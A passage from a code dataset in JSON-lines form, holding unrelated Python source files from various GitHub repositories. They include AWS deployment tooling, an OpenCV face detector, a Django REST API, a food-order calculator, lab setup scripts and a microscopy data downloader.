Limit=1,\n ScanIndexForward=False\n )\n if 'Items' in response and len(response['Items']) > 0 and 'JSON' in response['Items'][0]:\n json = response['Items'][0]['JSON']\n if event['queryStringParameters'] is not None and event['queryStringParameters']['gantt'] != '1':\n return Responses._200(json)\n return {\n 'headers': {\n 'Content-Type': 'text/html',\n 'Access-Control-Allow-Methods': '*',\n 'Access-Control-Allow-Origin': '*',\n },\n 'statusCode': 200,\n 'body': 
create_html_gantt_from_json(json),\n }\n else:\n return Responses._204()\n except ClientError as e:\n return Responses._CustomResponse(e.response['Error']['Message'], e.response['ResponseMetadata']['HTTPStatusCode'])\n\ndef create_html_gantt_from_json(json):\n solution = pd.DataFrame(json)\n solution = solution[solution.IsPresent == True]\n fig = ff.create_gantt(solution, index_col='Part', show_colorbar=True, group_tasks=True)\n return fig.to_html(full_html=False)","repo_name":"SamBeNuts/TAS-planificateur-backend","sub_path":"endpoints/getSolution.py","file_name":"getSolution.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"22798790080","text":"import cv2\nimport numpy as np\n\n\nfrontal_face_cascade = cv2.CascadeClassifier(\"src\\cascades\\data\\haarcascade_frontalface_alt.xml\")\n\ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n\nwhile(True):\n ret,frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frontal_faces = frontal_face_cascade.detectMultiScale(gray, scaleFactor = 1.5, minNeighbors=5)\n for (x, y, w, h) in frontal_faces:\n print(x,y,w,h)\n roi_color = frame[y:y+h,x:x+w]\n cv2.imwrite(\"roi_color.png\", roi_color)\n\n color = (0, 0, 255)\n stroke = 2\n cv2.rectangle(frame, (x,y), (x+w, y+h), color, stroke)\n\n\n\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"yudenSU/face_recognition","sub_path":"src/face_detect_cascade.py","file_name":"face_detect_cascade.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"40109152584","text":"from argparse import Namespace\nfrom enum import Enum\nfrom typing import Any, Callable, Dict, List, Literal, Tuple, Type\n\nfrom bagualu.entrances.text_classification import GtsEngineInterfaceClfStd\nfrom gts_common.framework.base_gts_engine_interface import (\n TRAIN_MODE, BaseGtsEngineInterface, GtsEngineArgs)\nfrom gts_common.framework.classification_finetune import \\\n BaseInferenceManagerClf\nfrom gts_common.framework.classification_finetune.consts import \\\n InferenceManagerInputSample\nfrom gts_common.pipeline_utils import load_args, save_args\nfrom gts_common.registry import PIPELINE_REGISTRY\n\nmode_to_interface: Dict[TRAIN_MODE, BaseGtsEngineInterface] = {\n TRAIN_MODE.STD: GtsEngineInterfaceClfStd()\n}\n\n\n@PIPELINE_REGISTRY.register(suffix=__name__) # type: ignore\ndef train_pipeline(args: GtsEngineArgs):\n # save args\n args = save_args(args)\n train_mode = TRAIN_MODE(args.train_mode)\n module_factory = mode_to_interface[train_mode]\n module_factory.prepare_training(args)\n module_factory.generate_training_pipeline(args).main()\n\n\n@PIPELINE_REGISTRY.register(suffix=__name__) # type: ignore\ndef prepare_inference(save_path):\n args: GtsEngineArgs = load_args(save_path) # type: ignore\n train_mode = TRAIN_MODE(args.train_mode)\n module_factory = mode_to_interface[train_mode]\n return module_factory.generate_inference_manager(args)\n\n\n@PIPELINE_REGISTRY.register(suffix=__name__) # type: ignore\ndef inference(samples: List[Dict[str, Any]],\n inference_manager: BaseInferenceManagerClf):\n inf_sample_list = [\n InferenceManagerInputSample(text=sample[\"content\"])\n for sample in samples\n ]\n results = inference_manager.inference(inf_sample_list)\n return 
results\n","repo_name":"IDEA-CCNL/GTS-Engine","sub_path":"gts_engine/pipelines/bagualu_classification.py","file_name":"bagualu_classification.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"64"} +{"seq_id":"1254787204","text":"print('Bem vindo(a) à Feijoadinha Querida da Sayuri Takano') # Identificador Pessoal\r\n\r\n\r\ndef vol_feijoada(): # função do menu do volume da feijoada\r\n while True:\r\n print('Menu do volume da feijoada.')\r\n try:\r\n ml = int(input('Digite a quantidade desejada(ml): '))\r\n vol_valor = ml * 0.08\r\n if ml < 300 or ml > 5000:\r\n print(\r\n 'Não aceitamos porções menores que 300ml ou maiores que 5l! Tente novamente!') # verificação de input\r\n continue\r\n elif ml >= 300 or ml <= 5000:\r\n return vol_valor\r\n except ValueError: # verificação de input\r\n print('Você não digitou um número. Tente novamente!')\r\n\r\n\r\ndef opc_feijoada(): # função do menu da opção da feijoada\r\n while True:\r\n print('Menu da opção da feijoada.')\r\n print('b - Básica (Feijão + paiol + costelinha) ')\r\n print('p - Premium (Feijão + paiol + costelinha + partes de porco)')\r\n print('s - Suprema (Feijão + paiol + costelinha + partes do porco + charque + calabresa + bacon)')\r\n peso = str(input('Digite a opção desejada: '))\r\n if peso != 'b' and peso != 'p' and peso != 's': # verificação de input\r\n print('Você digitou uma opção que não existe. Tente novamente!')\r\n elif peso == 'b':\r\n peso_valor = 1.00\r\n return peso_valor\r\n elif peso == 'p':\r\n peso_valor = 1.25\r\n return peso_valor\r\n elif peso == 's':\r\n peso_valor = 1.50\r\n return peso_valor\r\n\r\n\r\ndef acomp_feijoada(): # função do menu do acompanhamento da feijoada\r\n tot_acomp = 0\r\n while True:\r\n try:\r\n print('Deseja mais algum acompanhamento?')\r\n print('0 - não desejo mais acompanhamentos (encerrar pedido)') # atendimento encerrado caso seja escolhido\r\n print('1 - 200g de arroz')\r\n print('2 - 150g de farofa especial')\r\n print('3 - 100g de couve cozida')\r\n print('4 - 1 laranja descascada')\r\n acomp = int(input('>> '))\r\n if acomp <= -1 or acomp >= 5: # verificação de input\r\n print('Não há um acompanhamento para o número escolhido. Tente novamente')\r\n continue\r\n if acomp == 1:\r\n acomp_valor = 5.00\r\n if acomp == 2:\r\n acomp_valor = 6.00\r\n if acomp == 3:\r\n acomp_valor = 7.00\r\n if acomp == 4:\r\n acomp_valor = 3.00\r\n if acomp == 0:\r\n return tot_acomp\r\n tot_acomp += acomp_valor\r\n except ValueError: # verificação de input\r\n print('Você não digitou um número. Tente novamente!')\r\n\r\n\r\nvolume_feijoada = vol_feijoada()\r\nopcao_feijoada = opc_feijoada()\r\nacompanha_feijoada = acomp_feijoada()\r\ntotal = (volume_feijoada * opcao_feijoada) + acompanha_feijoada # resultado da equação que a empresa cobra por feijoada\r\nprint('O total a ser pago é R$ %.2f. 
(volume = %.2f * opção = %.2f + acompanhamento = %.2f) ' % (total, volume_feijoada,\r\nopcao_feijoada, acompanha_feijoada))\r\n","repo_name":"SayuTKN/Atividade-phyton","sub_path":"Trabalho 1/Questão 3.py","file_name":"Questão 3.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"64"} +{"seq_id":"71485637003","text":"from aws_syncr.filename_completer import filename_prompt, setup_completer\nfrom aws_syncr.formatter import MergedOptionStringFormatter\nfrom aws_syncr.compat import input, string_types\nfrom aws_syncr.errors import AwsSyncrError\nfrom aws_syncr.errors import UserQuit\n\nfrom Crypto.Util import Counter\nfrom Crypto.Cipher import AES\n\nfrom option_merge import MergedOptions\nfrom textwrap import dedent\nimport itertools\nimport readline\nimport logging\nimport base64\nimport shlex\nimport yaml\nimport sys\nimport os\n\nlog = logging.getLogger(\"aws_syncr.actions\")\n\navailable_actions = {}\n\ndef an_action(func):\n available_actions[func.__name__] = func\n func.label = \"Default\"\n return func\n\ndef find_lambda_function(aws_syncr, configuration):\n lambda_function = aws_syncr.artifact\n\n if 'lambda' not in configuration:\n raise AwsSyncrError(\"Please define lambda functions under the 'lambda' section of your configuration\")\n\n if not lambda_function:\n available = list(configuration['lambda'].items.keys())\n raise AwsSyncrError(\"Please specify --artifact for the lambda function to deploy\", available=available)\n\n wanted = ['lambda', lambda_function]\n if wanted not in configuration:\n raise AwsSyncrError(\"Couldn't find specified lambda function\", available=list(configuration[\"lambda\"].items.keys()))\n\n return configuration['lambda'].items[lambda_function]\n\ndef find_gateway(aws_syncr, configuration):\n amazon = configuration['amazon']\n\n stage = aws_syncr.stage\n gateway = aws_syncr.artifact\n\n if 'apigateway' not in configuration:\n raise AwsSyncrError(\"Please define apigateway in your configuration before trying to deploy a gateway\")\n\n if not gateway:\n available = list(configuration['apigateway'].items.keys())\n raise AwsSyncrError(\"Please specify --artifact for the gateway function to deploy\", available=available)\n\n wanted = ['apigateway', gateway]\n if wanted not in configuration:\n raise AwsSyncrError(\"Couldn't find specified api gateway\", available=list(configuration[\"apigateway\"].items.keys()))\n gateway = configuration['apigateway'].items[gateway]\n\n if not stage:\n raise AwsSyncrError(\"Please specify --stage\", available=list(gateway.stage_names))\n\n return aws_syncr, amazon, stage, gateway\n\ndef find_certificate_source(configuration, gateway, certificate):\n source = configuration.source_for(['apigateway', gateway, 'domain_names'])\n location = [\"apigateway\", gateway, 'domain_names']\n domain_names = configuration.get(location, ignore_converters=True)\n\n for name, domain in domain_names.items():\n if 'zone' in domain:\n zone = MergedOptionStringFormatter(configuration, '.'.join(location + ['zone']), value=domain.get('zone')).format()\n domain_name = \"{0}.{1}\".format(name, zone)\n if domain_name == certificate:\n if 'certificate' not in domain:\n domain['certificate'] = {}\n\n var = domain['certificate']\n\n class StickyChain(object):\n def __init__(self):\n self.lst = []\n\n def __add__(self, other):\n self.lst.extend(other)\n return self.lst\n\n def __contains__(self, item):\n return item in self.lst\n\n def __getitem__(self, index):\n return 
self.lst[index]\n chain = StickyChain()\n\n if isinstance(var, string_types):\n result = MergedOptionStringFormatter(configuration, '.'.join(location), value=var, chain=chain).format()\n if not isinstance(result, dict) and not isinstance(result, MergedOptions) and (not hasattr(result, 'is_dict') or not result.is_dict):\n raise AwsSyncrError(\"certificate should be pointing at a dictionary\", got=result, chain=['.'.join(location)] + chain)\n\n location = chain[-1]\n source = configuration.source_for(location)\n for info in configuration.storage.get_info(location, ignore_converters=True):\n location = [str(part) for part in info.path.path]\n\n if source and type(source) is list:\n source = source[0]\n\n return location, source\n\n@an_action\ndef list_tasks(collector):\n \"\"\"List the available_tasks\"\"\"\n print(\"Usage: aws_syncr \")\n print(\"\")\n print(\"Available environments to choose from are\")\n print(\"-----------------------------------------\")\n print(\"\")\n for environment in os.listdir(collector.configuration_folder):\n location = os.path.join(collector.configuration_folder, environment)\n if os.path.isdir(location) and not environment.startswith(\".\"):\n print(\"\\t{0}\".format(environment))\n\n print(\"\")\n print(\"Available tasks to choose from are:\")\n print(\"-----------------------------------\")\n print(\"\")\n keygetter = lambda item: item[1].label\n tasks = sorted(available_actions.items(), key=keygetter)\n sorted_tasks = sorted(list(tasks), key=lambda item: len(item[0]))\n max_length = max(len(name) for name, _ in sorted_tasks)\n for key, task in sorted_tasks:\n desc = dedent(task.__doc__ or \"\").strip().split('\\n')[0]\n print(\"\\t{0}{1} :-: {2}\".format(\" \" * (max_length-len(key)), key, desc))\n print(\"\")\n\n@an_action\ndef sync(collector):\n \"\"\"Sync an environment\"\"\"\n amazon = collector.configuration['amazon']\n aws_syncr = collector.configuration['aws_syncr']\n\n # Convert everything before we try and sync anything\n log.info(\"Converting configuration\")\n converted = {}\n for thing in collector.configuration[\"__registered__\"]:\n if thing in collector.configuration:\n converted[thing] = collector.configuration[thing]\n\n # Do the sync\n for typ in collector.configuration[\"__registered__\"]:\n if typ in converted:\n thing = converted[typ]\n if not aws_syncr.artifact or aws_syncr.artifact == typ:\n log.info(\"Syncing {0}\".format(typ))\n for name, item in thing.items.items():\n thing.sync_one(aws_syncr, amazon, item)\n\n if not amazon.changes:\n log.info(\"No changes were made!!\")\n\n@an_action\ndef deploy_lambda(collector):\n \"\"\"Deploy a lambda function\"\"\"\n amazon = collector.configuration['amazon']\n aws_syncr = collector.configuration['aws_syncr']\n find_lambda_function(aws_syncr, collector.configuration).deploy(aws_syncr, amazon)\n\n@an_action\ndef test_lambda(collector):\n \"\"\"Invoke a lambda function with the defined sample_event and compare against desired_output_for_test\"\"\"\n amazon = collector.configuration['amazon']\n amazon._validated = True\n aws_syncr = collector.configuration['aws_syncr']\n if not find_lambda_function(aws_syncr, collector.configuration).test(aws_syncr, amazon):\n raise AwsSyncrError(\"Failed to test the lambda\")\n\n@an_action\ndef deploy_and_test_lambda(collector):\n \"\"\"Do a deploy of a lambda function followed by invoking it\"\"\"\n deploy_lambda(collector)\n test_lambda(collector)\n\n@an_action\ndef deploy_gateway(collector):\n \"\"\"Deploy the apigateway to a particular stage\"\"\"\n 
configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n aws_syncr, amazon, stage, gateway = find_gateway(aws_syncr, configuration)\n gateway.deploy(aws_syncr, amazon, stage)\n\n if not configuration['amazon'].changes:\n log.info(\"No changes were made!!\")\n\n@an_action\ndef sync_and_deploy_gateway(collector):\n \"\"\"Do a sync followed by deploying the gateway\"\"\"\n configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n find_gateway(aws_syncr, configuration)\n\n artifact = aws_syncr.artifact\n aws_syncr.artifact = \"\"\n sync(collector)\n\n aws_syncr.artifact = artifact\n deploy_gateway(collector)\n\n@an_action\ndef test_gateway(collector):\n \"\"\"Specify after -- from the commandline and that gateway endpoint will be requested\"\"\"\n collector.configuration['amazon']._validated = True\n configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n aws_syncr, amazon, stage, gateway = find_gateway(aws_syncr, configuration)\n if not gateway.test(aws_syncr, amazon, stage):\n raise AwsSyncrError(\"Failed to test the gateway\")\n\n@an_action\ndef test_all_gateway_endpoints(collector):\n \"\"\"Do a test on all the available gateway endpoints\"\"\"\n collector.configuration['amazon']._validated = True\n configuration = collector.configuration\n aws_syncr = configuration['aws_syncr']\n aws_syncr, amazon, stage, gateway = find_gateway(aws_syncr, configuration)\n\n failure = False\n for method, resource in gateway.available_methods_and_endpoints():\n combination = \"{0} {1}\".format(method, resource)\n print(combination)\n print(\"=\" * len(combination))\n aws_syncr.extra = combination\n if not gateway.test(aws_syncr, amazon, stage):\n failure = True\n print(\"\")\n\n if failure:\n raise AwsSyncrError(\"Atleast one of the endpoints failed the test\")\n\n@an_action\ndef encrypt_certificate(collector):\n \"\"\"Write encrypted values for your certificate to the configuration\"\"\"\n configuration = collector.configuration\n amazon = configuration['amazon']\n aws_syncr = configuration['aws_syncr']\n certificate = aws_syncr.artifact\n\n available = []\n\n for gateway_name, gateway in configuration.get('apigateway', {}, ignore_converters=True).items():\n for name, options in gateway.get(\"domain_names\", {}).items():\n if \"zone\" in options:\n location = '.'.join(['apigateway', gateway_name, 'domain_names'])\n formatter = MergedOptionStringFormatter(configuration, location, value=options['zone'])\n available.append((gateway_name, \"{0}.{1}\".format(name, formatter.format())))\n\n if not available:\n raise AwsSyncrError(\"Please specify apigateway..domain_names..name in the configuration\")\n\n if not certificate:\n raise AwsSyncrError(\"Please specify certificate to encrypt with --artifact\", available=[a[1] for a in available])\n\n if certificate not in [a[1] for a in available]:\n raise AwsSyncrError(\"Unknown certificate\", available=[a[1] for a in available], got=certificate)\n\n gateway = [name for name, cert in available if cert == certificate][0]\n location, source = find_certificate_source(configuration, gateway, certificate)\n\n log.info(\"Gonna edit {0} in {1}\".format(location, source))\n current = MergedOptions.using(yaml.load(open(source)))\n dest = current[location]\n\n try:\n key_id = input(\"Which kms key do you want to use? \")\n region = input(\"What region is this key in? 
\")\n except EOFError:\n raise UserQuit()\n\n # Make the filename completion work\n setup_completer()\n\n # Create the datakey to encrypt with\n data_key = amazon.kms.generate_data_key(region, key_id)\n plaintext_data_key = data_key[\"Plaintext\"]\n encrypted_data_key = base64.b64encode(data_key[\"CiphertextBlob\"]).decode('utf-8')\n\n # Encrypt our secrets\n secrets = {}\n for name, desc in ((\"body\", \"certificate's crt file\"), (\"key\", \"private key file\"), (\"chain\", \"certificate chain\")):\n location = None\n while not location or not os.path.isfile(location):\n location = os.path.expanduser(filename_prompt(\"Where is the {0}? \".format(desc)))\n if not location or not os.path.isfile(location):\n print(\"Please give a location to a file that exists!\")\n\n with open(location, 'rb') as fle:\n data = fle.read()\n\n counter = Counter.new(128)\n encryptor = AES.new(plaintext_data_key[:32], AES.MODE_CTR, counter=counter)\n secrets[name] = base64.b64encode(encryptor.encrypt(data)).decode('utf-8')\n\n # Add in the encrypted values\n dest['body'] = {\"kms\": secrets['body'], \"location\": region, \"kms_data_key\": encrypted_data_key}\n dest['key'] = {\"kms\": secrets['key'], \"location\": region, \"kms_data_key\": encrypted_data_key}\n dest['chain'] = {\"kms\": secrets['chain'], \"location\": region, \"kms_data_key\": encrypted_data_key}\n\n # And write to the file!\n yaml.dump(current.as_dict(), open(source, 'w'), explicit_start=True, indent=2, default_flow_style=False)\n\n@an_action\ndef execute_as(collector):\n \"\"\"Execute a command (after the --) as an assumed role (specified by --artifact)\"\"\"\n # Gonna assume role anyway...\n collector.configuration['amazon']._validated = True\n\n # Find the arn we want to assume\n account_id = collector.configuration['accounts'][collector.configuration['aws_syncr'].environment]\n arn = \"arn:aws:iam::{0}:role/{1}\".format(account_id, collector.configuration['aws_syncr'].artifact)\n\n # Determine the command to run\n parts = shlex.split(collector.configuration[\"aws_syncr\"].extra)\n if not parts:\n suggestion = \" \".join(sys.argv) + \" -- /path/to/command_to_run\"\n msg = \"No command was provided. 
Try something like:\\n\\t\\t{0}\".format(suggestion)\n raise AwsSyncrError(msg)\n\n # Get our aws credentials environment variables from the assumed role\n env = dict(os.environ)\n env.update(collector.configuration['amazon'].iam.assume_role_credentials(arn))\n\n # Turn into the command we want to execute\n os.execvpe(parts[0], parts, env)\n","repo_name":"delfick/aws_syncr","sub_path":"aws_syncr/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":13542,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"64"} +{"seq_id":"44170414902","text":"from collections import namedtuple\nimport numpy as np\nfrom dm_control.rl.control import Task\nfrom dm_env import specs\n\nfrom environments.dm_control.utils import param\n\nclass Step(Task):\n \"\"\" Step task:\n Keep constant value and step to different constant value at t_step\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__()\n # Define default parameters\n par = namedtuple('par', 'name value description')\n self.default_par_list = [\n par('task_name','Step','Name of task'),\n par('maxinflow',5.,'max control inflow'),\n par('h_goal1',1.,'[m] target height 1st time interval'),\n par('h_goal2',0.8,'[m] target height 2nd time interval'),\n par('t_step',float('inf'),'[s] switching instant 1st->2nd target'),\n par('debug',False,'if True store data during episode')\n ]\n\n # Generate parameter dictionary\n self.par_dict = {x.name: x.value for x in self.default_par_list}\n\n # Overload parameters from inputs\n param.overload_par_dict(self.par_dict, **kwargs)\n\n # Init variable to store results when debug == True\n self.datadict = []\n\n def initialize_episode(self, physics):\n # Eventually pass some parameters\n self.datadict = []\n physics.reset()\n\n def get_reference(self, physics):\n \"\"\"Returns target reference\"\"\"\n if physics.time() < self.par_dict['t_step']:\n target = self.par_dict['h_goal1']\n else:\n target = self.par_dict['h_goal2']\n return target\n\n def get_observation(self, physics):\n # Let the actor observe the reference and the state\n return np.concatenate((\n [self.get_reference(physics)],\n physics.get_state()\n ))\n\n def get_reward(self, physics):\n sigma = 0.1\n mean = self.get_reference(physics)\n # Gaussian like rewards on target\n return np.exp(\n -np.power(physics.get_state()[0] - mean, 2.)/(2*np.power(sigma, 2.))\n )\n\n def before_step(self, action, physics):\n physics.set_control(action)\n # Store data dictionary for debugging\n if self.par_dict['debug']: extend_debug_datadict(self, physics, action)\n\n def observation_spec(self, physics):\n \"\"\"Returns the observation spec.\"\"\"\n return specs.Array(\n shape=(2,),\n dtype=np.float32,\n name='observation')\n\n def action_spec(self, physics):\n \"\"\"Returns the action spec.\"\"\"\n return specs.BoundedArray(\n shape=(1,),\n dtype=np.float32,\n minimum=0.,\n maximum=self.par_dict['maxinflow'],\n name='action')\n\n def get_par_dict(self):\n \"\"\"Return dictionary with parameters\"\"\"\n return self.par_dict\n\n def write_config_file(self, path, filename):\n \"\"\"Writes toml configuration file from parameters\"\"\"\n param.write_config_file(\n self.default_par_list,\n self.par_dict,\n path,\n filename\n )\n\n def set_par_from_config_file(self, path):\n \"\"\"Read config file and set parameters\"\"\"\n param.set_par_from_config_file(self.par_dict, path)\n\n\n# TODO(fc) move following utiles elsewhere\ndef extend_debug_datadict(task, physics, action):\n \"\"\"Append episode data to 
datadictionary\n\n Data are stored before taking the step\n \"\"\"\n task.datadict.append(\n {\n 'state': physics.get_state(),\n 'action': action,\n 'time': physics.time(),\n 'observation': task.get_observation(physics),\n 'reward': task.get_reward(physics),\n }\n )\n","repo_name":"francescocarpanese/code_acme","sub_path":"environments/dm_control/tank/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"29468370542","text":"import re\n\nCRC_TABLE = (\n 0x0000,\n 0xCC01,\n 0xD801,\n 0x1400,\n 0xF001,\n 0x3C00,\n 0x2800,\n 0xE401,\n 0xA001,\n 0x6C00,\n 0x7800,\n 0xB401,\n 0x5000,\n 0x9C01,\n 0x8801,\n 0x4400, )\n\n\ndef calc_crc(mybytes, crc=0):\n for byte in bytearray(mybytes):\n byte_char = byte\n # Taken verbatim from FIT SDK docs\n tmp = CRC_TABLE[crc & 0xF]\n crc = (crc >> 4) & 0x0FFF\n crc = crc ^ tmp ^ CRC_TABLE[byte_char & 0xF]\n\n tmp = CRC_TABLE[crc & 0xF]\n crc = (crc >> 4) & 0x0FFF\n crc = crc ^ tmp ^ CRC_TABLE[(byte_char >> 4) & 0xF]\n return crc\n\n\nMETHOD_NAME_SCRUBBER = re.compile(r'\\W|^(?=\\d)')\nUNIT_NAME_TO_FUNC_REPLACEMENTS = (\n ('/', ' per '),\n ('%', 'percent'),\n ('*', ' times '), )\n\n\ndef scrub_method_name(method_name, convert_units=False):\n if convert_units:\n for replace_from, replace_to in UNIT_NAME_TO_FUNC_REPLACEMENTS:\n method_name = method_name.replace(\n replace_from,\n '%s' % replace_to, )\n return METHOD_NAME_SCRUBBER.sub('_', method_name)\n","repo_name":"romses/FitView","sub_path":"fitparse/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"24168010760","text":"with open(\"src/whitelisted_addresses.json\", \"r\") as fid:\n lines = fid.readlines()\n# end with open\n\nwith open(\"utils/whitelist/whitelisted_addresses.json\", \"w\") as fid:\n fid.write(\"[\\n\")\n for ii,line in enumerate(lines):\n address = line.replace(\"\\n\",\"\").replace(\"'\",\"\").replace('\"',\"\").replace(\",\",\"\").replace(\" \",\"\")\n\n good_address = \"0x1A3a1A68f995cF23ddb0bc0777e2f7e9162F7855\"\n if len(address) != len(good_address):\n print(\"bad address: \", address)\n print(\"len bad add: \", len(address))\n print(\"len good add: \", len(good_address))\n input(\">>\")\n continue\n # end if\n\n if ii == len(lines)-1:\n fid.write(' \"' + address + '\"\\n')\n else:\n fid.write(' \"' + address + '\",\\n')\n # end if/else\n # end for\n fid.write(\"]\")\n# end with open\n","repo_name":"ryanjsfx2424/ComputationalFluidDynamicNFTs","sub_path":"V3.0.4/OrigoNFT/origo-mint/make_json.py","file_name":"make_json.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"32806577305","text":"import unittest\n\nfrom data_structures.classes import TreeNode\nfrom lowest_common_ancestor.solution import lowest_common_ancestor\n\n\nclass LowestCommonAncestorTest(unittest.TestCase):\n\n def test_simple(self):\n q = TreeNode(1, None, None)\n root = TreeNode(2, q, None)\n actual = lowest_common_ancestor(root, root, q)\n\n self.assertEqual(root, actual)\n\n def test_root_lca(self):\n p = TreeNode(2,\n TreeNode(0, None, None),\n TreeNode(4,\n TreeNode(3, None, None),\n TreeNode(5, None, None)\n )\n )\n q = TreeNode(8,\n TreeNode(7, None, None),\n TreeNode(9, None, None)\n )\n root = TreeNode(6, p, q)\n actual = lowest_common_ancestor(root, 
p, q)\n\n self.assertEqual(root, actual)\n\n def test_second_level_lca(self):\n q = TreeNode(4, TreeNode(3, None, None), TreeNode(5, None, None) )\n p = TreeNode(2, TreeNode(0, None, None), q)\n root = TreeNode(6, p, TreeNode(8, TreeNode(7, None, None), TreeNode(9, None, None)))\n\n actual = lowest_common_ancestor(root, p, q)\n\n self.assertEqual(p, actual)\n","repo_name":"sbeins55/leetcode_practice","sub_path":"lowest_common_ancestor/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"41909577581","text":"# SPDX-License-Identifier: GPL-2.0\n#\n# Description:\n#\n# do setup needed for the laptop from hs, when used as\n# lapPC\n#\n# End:\n\nfrom tbotlib import tbot\n\nlogging.info(\"args: workfd %s %s\", tb.workfd, tb.config.tc_workfd_check_if_dir_exists_name)\n\n# setup ip addr for p2p1 interface\ncmd = 'sudo ifconfig p2p1 192.168.2.1 up'\ntb.write_lx_sudo_cmd_check(tb.workfd, cmd, tb.config.user, tb.config.ip)\n\n# check if ftdi module is loaded, rmmod it if yes\ncmd = 'sudo lsmod | grep ftdi'\nret = tb.write_lx_sudo_cmd_check(tb.workfd, cmd, tb.config.user, tb.config.ip, endTC = False)\nif ret == True:\n cmd = 'sudo rmmod ftdi_sio'\n tb.write_lx_sudo_cmd_check(tb.workfd, cmd, tb.config.user, tb.config.ip)\n\ntb.end_tc(True)\n","repo_name":"hsdenx/tbot","sub_path":"src/tc/lab/tc_lab_prepare_laptop_hs.py","file_name":"tc_lab_prepare_laptop_hs.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"64"} +{"seq_id":"43340175992","text":"def evaluate_condition(condition, row):\n column, operator, value = condition.split()\n column_index = columns.index(column)\n column_value = row[column_index]\n if operator == '>':\n return column_value > int(value)\n elif operator == '<':\n return column_value < int(value)\n\n\nN, M, Q = map(int, input().split())\ncolumns = input().split()\nrows = []\nfor _ in range(N):\n rows.append(list(map(int, input().split())))\nconditions = []\nfor _ in range(Q):\n conditions.append(input())\n\ntotal_sum = 0\nfor row in rows:\n valid = True\n for condition in conditions:\n if not evaluate_condition(condition, row):\n valid = False\n break\n if valid:\n total_sum += sum(row)\n\nprint(total_sum)\n","repo_name":"ishkining/leetcode-problems","sub_path":"codewars/backend_autumn_2023/task_c_1.py","file_name":"task_c_1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"72072058445","text":"from rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom product.models import Product\nfrom product.serializers import UserSerializer\nfrom rest_framework.decorators import authentication_classes, permission_classes\n\n@api_view(['GET', 'POST'])\ndef product_list(request):\n if request.method=='GET':\n product_list = Product.objects.all()\n serializers = UserSerializer(product_list,many=True)\n return Response (serializers.data)\n\n elif request.method=='POST':\n serializers = UserSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response (serializers.data,status=status.HTTP_201_CREATED)\n return Response(serializers.errors,status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET','PUT','DELETE'])\n@authentication_classes([])\n@permission_classes([])\ndef 
product_details(request,pk):\n\n try:\n product_detail = Product.objects.get(pk=pk)\n except product_detail.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'DELETE':\n product_detail.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n elif request.method=='GET':\n serializers = UserSerializer(product_detail)\n return Response (serializers.data)\n\n elif request.method=='PUT':\n serializers = UserSerializer(product_detail,data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data)\n return Response(serializers.errors,status=status.HTTP_400_BAD_REQUEST)","repo_name":"ashrakrahman/Django-Token-Based-Authentication","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"22944268887","text":"from tryptag import TrypTag, CellLine\r\nfrom constants import SELECTED_GENES\r\nimport os\r\nimport shutil\r\n\r\nselected_genes = SELECTED_GENES\r\n\r\ndef download_data():\r\n tryptag = TrypTag()\r\n\r\n for cell_id, cell_info in selected_genes.items():\r\n tryptag.fetch_data(CellLine(life_stage=cell_info[1], gene_id=cell_id, terminus=cell_info[0]))\r\n\r\ndef create_dataset():\r\n # Define the source directory where you want to search for files\r\n source_directory = \"_tryptag_cache\"\r\n\r\n # Define the destination directory where you want to copy the selected files\r\n destination_directory = \"dataset/raw\"\r\n\r\n # Create the destination directory if it doesn't exist\r\n if not os.path.exists(destination_directory):\r\n os.makedirs(destination_directory)\r\n\r\n # Iterate through all subdirectories in the source directory\r\n for dir in os.listdir(source_directory):\r\n if dir == \"_zenodo\":\r\n continue\r\n\r\n for file in os.listdir(os.path.join(source_directory, dir)):\r\n name = file.split(\"_\")[0]\r\n terminus = file.split(\"_\")[2]\r\n\r\n # If the name is in selected_genes and the terminus matches the expected value\r\n if name in selected_genes.keys() and \"tif\" in file and terminus == selected_genes[name][0].upper():\r\n\r\n # Create a subdirectory for the gene if it doesn't exist\r\n gene_directory = os.path.join(destination_directory, 